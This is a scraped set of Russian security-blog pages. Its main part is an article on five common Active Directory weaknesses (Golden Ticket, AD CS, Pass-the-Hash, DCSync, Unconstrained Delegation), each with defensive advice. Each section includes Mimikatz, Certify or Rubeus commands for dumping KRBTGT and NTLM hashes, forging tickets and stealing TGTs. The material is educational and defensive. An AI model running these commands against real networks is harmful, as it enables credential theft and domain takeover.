    простых эксплоитов на том же Python, что сможет автоматизировать процесс добычи флагов и сдачи их в жюрейку (систему
    для начисления баллов за флаги).</p>

<p>Одним из самых важных и очевидных моментов является знание формата флага, что организаторы как правило должны
    проговаривать перед началом соревнований. Чаще всего это формат некоего хеша.</p>

<div data-toc="Заключение" id="сonclusion"></div>
<h3>Заключение</h3>
<p>Эти простые советы помогут вам составить чёткий план подготовки к соревнованиям, а исходя из этого плана можно будет
    составить конкретный план действий.</p>
<blockquote>
    <p>Всё, что нужно для старта — уже на HackerLab!</p>
    <p>👉 <a href="https://hackerlab.pro/" target="_blank">Заходи, решай, прокачивайся!</a></p>
</blockquote>
</body>
</html>


Как начать участвовать в CTF-соревнованиях: руководство для новичков

Узнайте о самых распространенных уязвимостях Active Directory, которые эксплуатируют хакеры. Разбор реальных кейсов, практические советы по защите и рекомендации для пентестеров

<!doctype html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании</title>
</head>
<body>
<p>Знаете ли вы, что простая конфигурационная ошибка в Active Directory может стать входным билетом злоумышленника в
    вашу сеть? Такие уязвимости мы видим почти в каждой компании.</p>

<div data-toc="1. Введение" id="introduction"></div>
<h2>Введение</h2>
<p>Active Directory (AD) — ключевая технология, на которой строится инфраструктура корпоративных сетей. Упрощая
    управление аутентификацией и доступами, AD зачастую становится лакомым куском для злоумышленников.</p>

<p>В этом материале мы собрали пять самых распространенных уязвимостей Active Directory, используемых на практике — от
    атак с Golden Ticket до DCSync. Вы узнаете, как они работают, что делают хакеры на следующем шаге и как этого
    избежать.</p>

<div data-toc="2. Golden Ticket" id="golden-ticket"></div>
<h2>1. Золотые билеты (Golden Ticket)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/golden_ticket.png"
     alt="Golden Ticket">

<h3>Как это работает?</h3>
<p>Злоумышленник получает доступ к хэшу пароля учетной записи <b>KRBTGT</b> — системного сервиса, выдающего
    Kerberos-билеты. Используя этот хэш, он создает «золотой билет», дающий полный доступ к домену без проверки
    сервером.</p>

<p><b>Что делает атакующий дальше?</b></p>
<ul>
    <li>Создает учетные записи, невидимые для логов</li>
    <li>Получает доступ к критическим данным</li>
    <li>Использует постоянный доступ к инфраструктуре</li>
    <li>Подделывает билеты с любыми сроками действия, обходя двухфакторную аутентификацию</li>
</ul>

<p><b>Как это выглядит на практике:</b><br>
    В 2023 году банк в Восточной Европе потерял контроль над своей сетью. После компрометации KRBTGT злоумышленники
    мигрировали данные клиентов в течение нескольких дней, оставаясь незаметными.</p>

<h3>Пример:</h3>
<pre><code># Извлекаем хэш KRBTGT с помощью Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'

# Создаем "золотой билет"
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:a9b3c... /ticket:golden.kirbi"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Регулярно меняйте пароль учетной записи KRBTGT (2 раза подряд для полной ротации)</li>
    <li>Включите аудит событий <b>4662</b> (доступ к объектам) для раннего выявления проблем.</li>
</ul>

<div data-toc="3. Уязвимости службы сертификатов AD CS" id="ad-cs"></div>
<h2>2. Уязвимости службы сертификатов AD CS</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ad_cs.png"
     alt="AD CS">

<h3>В чем проблема?</h3>
<p>Служба AD CS, используемая для управления цифровыми сертификатами, может содержать уязвимые шаблоны. Эти шаблоны
    позволяют злоумышленнику успешно пройти аутентификацию, получив права администратора через сертификат.</p>

<p><b>Что делает злоумышленник дальше?</b></p>
<ul>
    <li>С помощью полученного сертификата компрометирует сессии через RDP, WinRM или SMB</li>
    <li>Устанавливает бэкдоры в инфраструктуре</li>
    <li>Использует сертификаты для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный кейс:</b><br>
    В 2024 году ритейлер потерял 2,5 ТБ данных клиентов из-за атаки на AD CS. Злоумышленники использовали слабые
    настройки шаблонов для получения администраторских привилегий.</p>

<h3>Эксплуатация:</h3>
<pre><code># Поиск уязвимых шаблонов
Certify.exe find /vulnerable

# Запрос сертификата для доменного админа
Certify.exe request /ca:ca.corp.local\corp-CA /template:VulnerableTemplate /altname:Administrator
</code></pre>

<h3>Меры защиты</h3>
<ul>
    <li>Убедитесь, что шаблоны не используют <b>ENROLLEE_SUPPLIES_SUBJECT</b></li>
    <li>Проверьте права на использование шаблонов и ограничьте доступ к ним</li>
</ul>

<div data-toc="4. Pass-the-Hash (PtH)" id="pth"></div>
<h2>3. Pass-the-Hash (PtH)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/pth.png"
     alt="PtH">

<h3>Как это работает?</h3>
<p>Хэши паролей NTLM, находящиеся в памяти LSASS, позволяют атакующему аутентифицироваться без знания реального
    пароля.</p>

<p><b>Что делает хакер дальше?</b></p>
<ul>
    <li>Распространяется через SMB или SQL-службы на другие машины</li>
    <li>Использует полученные привилегии для внедрения эксплойтов</li>
</ul>

<p><b>Пример атаки из жизни:</b><br>
    На одном из проектов злоумышленник с помощью PtH распространился от обычного пользователя до уровня Domain Admin
    менее чем за час.</p>

<h3>Пример</h3>
<pre><code># Дамп хэшей
sekurlsa::logonpasswords

# Используем хэш для доступа к серверу
sekurlsa::pth /user:Admin /domain:corp.local /ntlm:a9b3c... /run:"cmd.exe"
</code></pre>

<h3>Совет:</h3>
<ul>
    <li>Включите <b>Credential Guard</b> для защиты хэшей в памяти (учтите, что он защищает только локальные
        учетные записи)
    </li>
    <li>Перенастройте корпоративную инфраструктуру так, чтобы исключить использование NTLM или ограничьте его через
        Group Policy.
    </li>
</ul>

<div data-toc="5. DCSync-атаки" id="dcsync"></div>
<h2>4. DCSync-атаки</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/dcsync.png"
     alt="dcsync">

<h3>Что это?</h3>
<p>DCSync-атака позволяет злоумышленнику с правами <b>Replicating Directory Changes</b> выдавать себя за
    контроллер домена и запрашивать хэши паролей пользователей, включая администраторов.</p>

<p><b>Обычно затем атакующий делает следующее:</b></p>
<ul>
    <li>Переходит к созданию Golden Ticket</li>
    <li>Извлекает учетные записи привилегированных пользователей</li>
    <li>Получает полные учетные данные для компрометации сетевой инфраструктуры</li>
</ul>

<p><b>Кейс из практики:</b><br>
    В 2022 году группа киберпреступников проникла в инфраструктуру госучреждения и благодаря DCSync получила полный
    доступ к сети.</p>

<h3>Пример</h3>
<pre><code># Выполняем DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
</code></pre>

<h3>Как защититься?</h3>
<ul>
    <li>Ограничьте доступ к правам <b>Replicating Directory Changes</b>, <b>Replicating Directory Changes
        All</b> и <b>Replicating Directory Changes In Filtered Set</b></li>
    <li>Ручной аудит списков доступа к AD для ключевых узлов</li>
</ul>

<div data-toc="6. Unconstrained Delegation" id="ud"></div>
<h2>5. Неограниченное делегирование (Unconstrained Delegation)</h2>
<img src="https://hackerlab.pro/game_api/articles/static/4cd0b407-2f2f-4ff1-b1e3-bce76d742a18/ud.png"
     alt="ud">

<h3>Почему это опасно?</h3>
<p>Сервисы с <b>Unconstrained Delegation</b> хранят TGT-билеты других пользователей, включая администраторов.
    Если хакер получает доступ к такому серверу, он может использовать эти билеты для выполнения любого действия от
    имени атакуемого пользователя.</p>

<p><b>Следующие шаги:</b></p>
<ul>
    <li>Эскалация привилегий</li>
    <li>Выполнение подложных транзакций в системах, подключенных к атакуемому серверу</li>
    <li>Использование TGT-билетов для выполнения атак Pass-the-Ticket (PtT)</li>
</ul>

<p><b>Реальный пример:</b><br>
    Производитель ПО был атакован через SQL-сервер с включенной делегацией. Билеты администраторов использовались для
    подключения к финансовым системам компании.</p>

<h3>Пример</h3>
<pre><code># Поиск серверов с Unconstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Кража TGT через SpoolService
Rubeus.exe monitor /interval:5 /filteruser:SERVER01$
</code></pre>

<h3>Рекомендации:</h3>
<ul>
    <li>Переведите все ресурсы на <b>Constrained Delegation</b></li>
    <li>Отключите делегацию для узлов, где она не требуется</li>
    <li>Проверьте Resource-Based Constrained Delegation (RBCD) и ограничьте ее использование</li>
</ul>

<div data-toc="7. Заключение" id="conclusion"></div>
<h2>Заключение</h2>
<p>Эти уязвимости подчеркивают, как легко атакующий может получить полномасштабный доступ через ошибки в конфигурации
    AD.</p>

<p><b>Ваши шаги:</b></p>
<ol>
    <li>Проверьте наличие описанных проблем в вашей сети.</li>
    <li>Ограничьте доступы и настройте аудит.</li>
    <li>Обучайте специалистов, чтобы держать инфраструктуру под контролем.</li>
</ol>

<h2>Часто задаваемые вопросы</h2>

<p><b>Q: Как часто нужно проверять AD на уязвимости?</b><br>
    A: Минимум раз в квартал + после любых изменений в инфраструктуре.</p>

<p><b>Q: Какие инструменты использовать для проверки?</b><br>
    A: BloodHound, PingCastle, ADRecon.</p>

<p><b>Q: Можно ли полностью защититься от этих атак?</b><br>
    A: 100% защиты нет, но можно снизить риски на 90% через правильную конфигурацию.</p>

<blockquote>
<p>Хотите научиться находить и использовать такие уязвимости в легальных пентестах? <b>29 мая стартует новый поток
    курса по тестированию AD от Codeby.</b></p>
<p>👉 <a href="https://ad.codeby.school/" target="_blank">Забронировать место на курсе</a></p>
</blockquote>
</body>
</html>

Топ-5 уязвимостей Active Directory, которые мы находим почти в каждой компании

Шесть инструментов, которые мы собрали в статье, — это твой первый боевой набор. Каждый из них открывает тебе глаза на то, как работает веб: что передаётся "за кадром", как устроены формы авторизации, какие ошибки допускают даже крупные компании

Блог

Самые популярные статьи: